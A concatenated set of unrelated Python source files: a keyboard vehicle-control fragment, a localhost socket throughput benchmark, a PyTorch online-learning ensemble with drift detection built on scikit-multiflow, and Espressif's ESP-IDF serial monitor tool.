self._steer_cache = min(0.95, max(-0.95, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = keys[K_SPACE]
|
perf2.py
|
from socket import *
import time
from threading import Thread
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('localhost', 25000))
n= 0
def monitor():
global n
while True:
time.sleep(1)
print(n, 'reqs/s')
n = 0
Thread(target=monitor).start()
while True:
sock.send(b'1')
resp = sock.recv(100)
n += 1
|
NNPytorchMulti.py
|
import copy
import threading
import numpy as np
from skmultiflow.core import BaseSKMObject, ClassifierMixin
from skmultiflow.utils.utils import *
from skmultiflow.neural_networks.utils import *
from skmultiflow.drift_detection.base_drift_detector import BaseDriftDetector
from skmultiflow.drift_detection import ADWIN
import torch
import torch.nn as nn
import torch.optim as optim
default_network_layers = [{'neurons': 0, 'input_d': 0}, {'neurons': 2 ** 10, 'g': 3}, {'neurons': 1, 'g': 1}]
OP_TYPE_SGD = 'SGD'
OP_TYPE_SGD_NC = 'SGD-NC'
OP_TYPE_ADAGRAD = 'Adagrad'
OP_TYPE_ADAGRAD_NC = 'Adagrad-NC'
OP_TYPE_RMSPROP = 'RMSprop'
OP_TYPE_RMSPROP_NC = 'RMSprop-NC'
OP_TYPE_ADADELTA = 'Adadelta'
OP_TYPE_ADADELTA_NC = 'Adadelta-NC'
OP_TYPE_ADAM = 'Adam'
OP_TYPE_ADAM_NC = 'Adam-NC'
OP_TYPE_ADAM_AMSG = 'Adam-AMSG'
OP_TYPE_ADAM_AMSG_NC = 'Adam-AMSG-NC'
class PyNet(nn.Module):
def __init__(self, nn_layers=None):
super(PyNet, self).__init__()
if nn_layers is None:
return
linear = []
self.f = []
for l in range(1, len(nn_layers), 1):
if l == 1:
linear.append(nn.Linear(nn_layers[0]['input_d'], nn_layers[l]['neurons']))
else:
linear.append(nn.Linear(nn_layers[l - 1]['neurons'], nn_layers[l]['neurons']))
if nn_layers[l]['g'] == Tanh:
self.f.append(nn.Tanh())
elif nn_layers[l]['g'] == Sigmoid:
self.f.append(nn.Sigmoid())
elif nn_layers[l]['g'] == Relu:
self.f.append(nn.ReLU())
elif nn_layers[l]['g'] == LeakyRelu:
self.f.append(nn.LeakyReLU())
else:
pass
self.linear = nn.ModuleList(linear)
def forward(self, x):
for i, l in enumerate(self.linear):
x = self.f[i](l(x))
return x
class ANN:
def __init__(self,
learning_rate=0.03,
network_layers=default_network_layers,
class_labels=['0','1'], # {'up':0,'down':1}
use_cpu=True,
process_as_a_batch=False,
optimizer_type=OP_TYPE_SGD,
warning_detection_method: BaseDriftDetector = ADWIN(delta=1e-8, direction=ADWIN.DETECT_DOWN),
drift_detection_method: BaseDriftDetector = ADWIN(delta=1e-3, direction=ADWIN.DETECT_DOWN)):
        # configuration variables (which have the same names as the init parameters)
self.learning_rate = learning_rate
self.network_layers = copy.deepcopy(network_layers)
self.class_labels = class_labels
self.use_cpu = use_cpu
self.process_as_a_batch = process_as_a_batch
self.optimizer_type = optimizer_type
if self.optimizer_type == OP_TYPE_SGD_NC \
or self.optimizer_type == OP_TYPE_ADAGRAD_NC \
or self.optimizer_type == OP_TYPE_RMSPROP_NC \
or self.optimizer_type == OP_TYPE_ADADELTA_NC \
or self.optimizer_type == OP_TYPE_ADAM_NC \
or self.optimizer_type == OP_TYPE_ADAM_AMSG_NC:
self.drift_detection_method = None
self.warning_detection_method = None
else:
self.drift_detection_method = drift_detection_method
if self.drift_detection_method.__class__.__name__ == 'HDDM_A' \
or self.drift_detection_method.__class__.__name__ == 'HDDM_W':
if warning_detection_method is not None:
                    print('Parameter warning_detection_method should be None for drift_detection_methods HDDM_A and'
                          ' HDDM_W as they have built-in warning detection. Hence setting it to None.')
self.warning_detection_method = None
else:
self.warning_detection_method = None
else:
self.warning_detection_method = warning_detection_method
# status variables
self.net = None
self.optimizer = None
self.criterion = None
self.loss = None
self.device = None
self.class_to_label = {}
self.label_to_class = {}
self.samples_seen = 0
self.detected_warnings = 0
self.init_values()
def init_values(self):
# init status variables
self.net = None
self.optimizer = None
self.criterion = None
self.loss = None
self.device = None
self.class_to_label = {}
self.label_to_class = {}
self.samples_seen = 0
self.detected_warnings = 0
initialize_network = False
for i in range(len(self.class_labels)):
self.class_to_label.update({i: self.class_labels[i]})
self.label_to_class.update({self.class_labels[i]: i})
if isinstance(self.network_layers, nn.Module):
self.net = self.network_layers
self.initialize_net_para()
elif isinstance(self.network_layers, list):
if self.network_layers[0]['input_d'] is None or self.network_layers[0]['input_d'] == 0:
# wait till we receive the first instance to get input dimensions
# to initialize the passed-in network
self.network_layers[0]['input_d'] = 0
else:
initialize_network = True
else:
self.network_layers = copy.deepcopy(default_network_layers)
            print('Unknown network type passed in, setting the network type to the default: {}'.format(self.network_layers))
if initialize_network:
self.initialize_network(self.network_layers)
if self.use_cpu:
self.device = torch.device("cpu")
else:
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# print(self.device)
def init_optimizer(self):
if self.optimizer_type == OP_TYPE_ADAGRAD or self.optimizer_type == OP_TYPE_ADAGRAD_NC:
self.optimizer = optim.Adagrad(self.net.parameters(), lr=self.learning_rate, lr_decay=0, weight_decay=0,
initial_accumulator_value=0, eps=1e-10)
elif self.optimizer_type == OP_TYPE_ADADELTA or self.optimizer_type == OP_TYPE_ADADELTA_NC:
self.optimizer = optim.Adadelta(self.net.parameters(), lr=self.learning_rate, eps=1e-10)
elif self.optimizer_type == OP_TYPE_RMSPROP or self.optimizer_type == OP_TYPE_RMSPROP_NC:
self.optimizer = optim.RMSprop(self.net.parameters(), lr=self.learning_rate, alpha=0.99, weight_decay=0,
eps=1e-10)
elif self.optimizer_type == OP_TYPE_SGD or self.optimizer_type == OP_TYPE_SGD_NC:
self.optimizer = optim.SGD(self.net.parameters(), lr=self.learning_rate)
elif self.optimizer_type == OP_TYPE_ADAM or self.optimizer_type == OP_TYPE_ADAM_NC:
self.optimizer = optim.Adam(self.net.parameters(), lr=self.learning_rate, betas=(0.9, 0.999), eps=1e-10,
weight_decay=0, amsgrad=False)
elif self.optimizer_type == OP_TYPE_ADAM_AMSG or self.optimizer_type == OP_TYPE_ADAM_AMSG_NC:
self.optimizer = optim.Adam(self.net.parameters(), lr=self.learning_rate, betas=(0.9, 0.999), eps=1e-10,
weight_decay=0, amsgrad=True)
else:
print('Invalid optimizer type = {}'.format(self.optimizer_type))
def initialize_net_para(self):
self.init_optimizer()
# for multi class classification
# criterion = nn.CrossEntropyLoss()
# for binary classification
# combines a Sigmoid layer
# self.criterion = nn.BCEWithLogitsLoss()
self.criterion = nn.BCELoss()
print('Network configuration:\n'
'{}\n'
'======================================='.format(self))
def initialize_network(self, network_layers=None):
self.net = PyNet(network_layers)
self.initialize_net_para()
def train_net(self, x, y):
if torch.cuda.is_available():
if self.device.type == 'cpu':
pass
else:
x = x.to(self.device)
y = y.to(self.device)
else:
pass
self.optimizer.zero_grad() # zero the gradient buffers
# # forward propagation
output = self.net(x)
# backward propagation
# print(self.learning_rate)
# print(self.net.linear[0].weight.data)
if self.learning_rate > 0.0:
# print('here')
self.loss = self.criterion(output, y)
self.loss.backward()
self.optimizer.step() # Does the update
if self.drift_detection_method is not None:
# get predicted class and compare with actual class label
labels_proba = torch.cat((1 - output, output), 1)
predicted_label = torch.argmax(labels_proba, dim=1)
predicted_matches_actual = predicted_label == y
self.drift_detection_method.add_element(1 if predicted_matches_actual else 0)
if self.warning_detection_method is not None:
self.warning_detection_method.add_element(1 if predicted_matches_actual else 0)
# pass the difference to the detector
# predicted_matches_actual = torch.abs(y-output).detach().numpy()[0]
# self.drift_detection_method.add_element(predicted_matches_actual)
            # Check if there was a warning
if self.warning_detection_method is not None:
if self.warning_detection_method.detected_change():
self.detected_warnings += 1
else: # warning detector is None, hence drift detector has warning detection capability.
if self.drift_detection_method.detected_warning_zone():
self.detected_warnings += 1 # 3 is the threshold level
            # Check if there was a change
if self.detected_warnings > 3 and self.drift_detection_method.detected_change():
print('Drift detected by {} around {} th sample. Hence resetting optimizer'.format(
self.drift_detection_method, self.samples_seen))
self.detected_warnings = 0
self.init_optimizer()
def partial_fit(self, X, r, c, y):
# r, c = get_dimensions(X)
if self.net is None:
self.network_layers[0]['input_d'] = c
self.initialize_network(self.network_layers)
if self.process_as_a_batch:
self.samples_seen += r
self.train_net(x=torch.from_numpy(X).float(), y=torch.from_numpy(np.array(y)).view(-1, 1).float())
else: # per instance processing (default behaviour)
for i in range(r):
x = torch.from_numpy(X[i])
yy = torch.from_numpy(np.array(y[i]))
x = x.view(1, -1).float()
yy = yy.view(1, -1).float()
x.unsqueeze(0)
yy.unsqueeze(0)
self.samples_seen += 1
self.train_net(x=x, y=yy)
return self
def predict_proba(self, X, r, c):
# r, c = get_dimensions(X)
if self.net is None:
self.network_layers[0]['input_d'] = c
self.initialize_network(self.network_layers)
if self.process_as_a_batch:
y_prob = self.net(torch.from_numpy(X).float())
return torch.cat((1 - y_prob, y_prob), 1).detach().numpy()
else: # per instance processing (default behaviour)
proba = []
for i in range(r):
x = torch.from_numpy(X[i])
x = x.view(1, -1).float()
x.unsqueeze(0)
                with torch.no_grad():
                    y_prob = self.net(x)
                # store plain floats so callers can place the pair into a numpy row
                proba.append([1.0 - y_prob.item(), y_prob.item()])
return np.asarray(proba)
def reset(self):
        # configuration variables (which have the same names as the init parameters) should be copied by the calling function
self.init_values()
return self
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
def net_train(net: ANN, X: np.ndarray, r, c, y: np.ndarray):
net.partial_fit(X, r, c, y)
def net_predict_proba(net: ANN, X: np.ndarray, r, c, proba, i):
proba[i] = net.predict_proba(X, r, c)
net_config = [
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.05},
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.07},
{'optimizer_type': OP_TYPE_RMSPROP_NC, 'l_rate': 0.01},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_ADAGRAD_NC, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.07},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.09},
{'optimizer_type': OP_TYPE_ADAGRAD_NC, 'l_rate': 0.09},
{'optimizer_type': OP_TYPE_ADAM, 'l_rate': 0.01},
{'optimizer_type': OP_TYPE_ADAM_NC, 'l_rate': 0.01},
]
class DeepNNPytorch(BaseSKMObject, ClassifierMixin):
def __init__(self,
learning_rate=0.03,
network_layers=default_network_layers,
class_labels=['0','1'], # {'up':0,'down':1}
use_cpu=True,
process_as_a_batch=False,
optimizer_type=OP_TYPE_SGD,
warning_detection_method: BaseDriftDetector = ADWIN(delta=1e-8),
drift_detection_method: BaseDriftDetector = ADWIN(delta=1e-3),
use_threads=False):
        # configuration variables (which have the same names as the init parameters)
self.class_labels = class_labels
self.use_threads = use_threads
super().__init__()
# status variables
self.nets = [] # type: List[ANN]
self.class_to_label = {}
self.init_values()
def init_values(self):
# init status variables
self.class_to_label = {}
for i in range(len(self.class_labels)):
self.class_to_label.update({i: self.class_labels[i]})
for i in range(len(net_config)):
self.nets.append(ANN(learning_rate=net_config[i]['l_rate'], optimizer_type=net_config[i]['optimizer_type'],
class_labels=self.class_labels))
def partial_fit(self, X, y, classes=None, sample_weight=None):
r, c = get_dimensions(X)
if self.use_threads:
t = []
for i in range(len(self.nets)):
t.append(threading.Thread(target=net_train, args=(self.nets[i], X, r, c, y,)))
for i in range(len(self.nets)):
t[i].start()
for i in range(len(self.nets)):
t[i].join()
else:
for i in range(len(self.nets)):
net_train(self.nets[i], X, r, c, y)
return self
def predict(self, X):
y_proba = self.predict_proba(X)
pred_sum_per_class = np.sum(y_proba, axis=0)
pred_avgsum_per_class = np.divide(pred_sum_per_class, len(self.nets))
y_pred = np.argmax(pred_avgsum_per_class, axis=0)
return vectorized_map_class_to_label([y_pred], class_to_label_map=self.class_to_label)
def predict_proba(self, X):
r, c = get_dimensions(X)
proba = np.zeros([len(self.nets), 2])
# if self.use_threads:
# t = []
# for i in range(len(self.nets)):
# t.append(threading.Thread(target=net_predict_proba, args=(self.nets[i], X, r, c, proba, i,)))
#
# for i in range(len(self.nets)):
# t[i].start()
#
# for i in range(len(self.nets)):
# t[i].join()
# else:
for i in range(len(self.nets)):
net_predict_proba(self.nets[i], X, r, c, proba, i)
return np.asarray(proba)
def reset(self):
        # configuration variables (which have the same names as the init parameters) should be copied by the calling function
for i in range(len(self.nets)):
self.nets[i].reset()
return self
def stream_ended(self):
pass
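# Illustrative usage sketch (added for clarity, not part of the original
# module; assumes the skmultiflow fork providing the utils imported above):
#
#     from skmultiflow.data import SEAGenerator
#     stream = SEAGenerator()
#     clf = DeepNNPytorch(use_threads=False)
#     X, y = stream.next_sample(20)
#     clf.partial_fit(X, y)                # trains every ANN in the ensemble
#     X_next, _ = stream.next_sample()
#     print(clf.predict(X_next))           # argmax of the averaged probabilities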
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
# - If core dump output is detected, it is converted to a human-readable report
# by espcoredump.py.
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import division, print_function, unicode_literals
import argparse
import codecs
import datetime
import os
import re
import subprocess
from builtins import bytes, chr, object
try:
import queue
except ImportError:
import Queue as queue
import ctypes
import json
import shlex
import sys
import tempfile
import textwrap
import threading
import time
import types
from distutils.version import StrictVersion
from io import open
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
try:
import websocket
except ImportError:
# This is needed for IDE integration only.
pass
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color, newline='\n'):
""" Print a message to stderr with colored highlighting """
sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))
def yellow_print(message, newline='\n'):
color_print(message, ANSI_YELLOW, newline)
def red_print(message, newline='\n'):
color_print(message, ANSI_RED, newline)
__version__ = '1.1'
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = 'xtensa-esp32-elf-'
DEFAULT_PRINT_FILTER = ''
# coredump related messages
COREDUMP_UART_START = b'================= CORE DUMP START ================='
COREDUMP_UART_END = b'================= CORE DUMP END ================='
COREDUMP_UART_PROMPT = b'Press Enter to print core dump to UART...'
# coredump states
COREDUMP_IDLE = 0
COREDUMP_READING = 1
COREDUMP_DONE = 2
# coredump decoding options
COREDUMP_DECODE_DISABLE = 'disable'
COREDUMP_DECODE_INFO = 'info'
# panic handler related messages
PANIC_START = r'Core \s*\d+ register dump:'
PANIC_END = b'ELF file SHA256:'
PANIC_STACK_DUMP = b'Stack memory:'
# panic handler decoding states
PANIC_IDLE = 0
PANIC_READING = 1
# panic handler decoding options
PANIC_DECODE_DISABLE = 'disable'
PANIC_DECODE_BACKTRACE = 'backtrace'
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
                        # In testing mode stdin is connected to a PTY but is not used for any input. For a PTY
                        # the cancellation via fcntl.ioctl doesn't work and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol='CRLF'):
self.translate_eol = {
'CRLF': lambda c: c.replace('\n', '\r\n'),
'CR': lambda c: c.replace('\n', '\r'),
'LF': lambda c: c.replace('\r', '\n'),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
yellow_print('Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart')
# to fast trigger pause without press menu key
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
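# Illustrative sketch (added for clarity, not part of the original tool):
# the menu key arms the parser, the next key selects a command, and ordinary
# keys are passed through with EOL translation.
def _console_parser_example():
    cp = ConsoleParser()
    assert cp.parse(CTRL_T) is None                    # menu key pressed, nothing emitted yet
    assert cp.parse(CTRL_R) == (TAG_CMD, CMD_RESET)    # Ctrl-T Ctrl-R -> reset command
    assert cp.parse('x\n') == (TAG_KEY, 'x\r\n')       # default CRLF translation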
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
time.sleep(0.005) # Add a delay to meet the requirements of minimal EN low time (2ms for ESP32-C3)
self.serial.rts = False
self.serial.dtr = self.serial.dtr # usbser.sys workaround
try:
while self.alive:
try:
data = self.serial.read(self.serial.in_waiting or 1)
except (serial.serialutil.SerialException, IOError) as e:
data = b''
# self.serial.open() was successful before, therefore, this is an issue related to
# the disappearance of the device
red_print(e)
yellow_print('Waiting for the device to reconnect', newline='')
self.serial.close()
while self.alive: # so that exiting monitor works while waiting
try:
time.sleep(0.5)
self.serial.open()
break # device connected
except serial.serialutil.SerialException:
yellow_print('.', newline='')
sys.stderr.flush()
yellow_print('') # go to new line
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict['*'] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get('*', self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get('*', self.LEVEL_N) > self.LEVEL_N
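# Illustrative sketch (added for clarity, not part of the original tool):
# a --print_filter of "wifi:W *:E" shows the wifi tag at warning level and
# above and every other tag at error level and above. The sample log lines
# are made up for demonstration.
def _line_matcher_example():
    lm = LineMatcher('wifi:W *:E')
    assert lm.match('W (1234) wifi: retrying connection')
    assert not lm.match('I (1234) boot: loading app')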
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make='make', encrypted=False,
toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol='CRLF',
decode_coredumps=COREDUMP_DECODE_INFO,
decode_panic=PANIC_DECODE_DISABLE,
target=None,
websocket_client=None,
enable_address_decoding=True):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
self.enable_address_decoding = enable_address_decoding
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith('socket://')  # testing hook - data from serial can make the monitor exit
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.encrypted = encrypted
self.toolchain_prefix = toolchain_prefix
self.websocket_client = websocket_client
self.target = target
# internal state
self._last_line_part = b''
self._gdb_buffer = b''
self._pc_address_buffer = b''
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
self._decode_coredumps = decode_coredumps
self._reading_coredump = COREDUMP_IDLE
self._coredump_buffer = b''
self._decode_panic = decode_panic
self._reading_panic = PANIC_IDLE
self._panic_buffer = b''
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no further data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
                    # the last line. This is a fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError('Bad event data %r' % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + 'Stopping condition has been received\n')
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
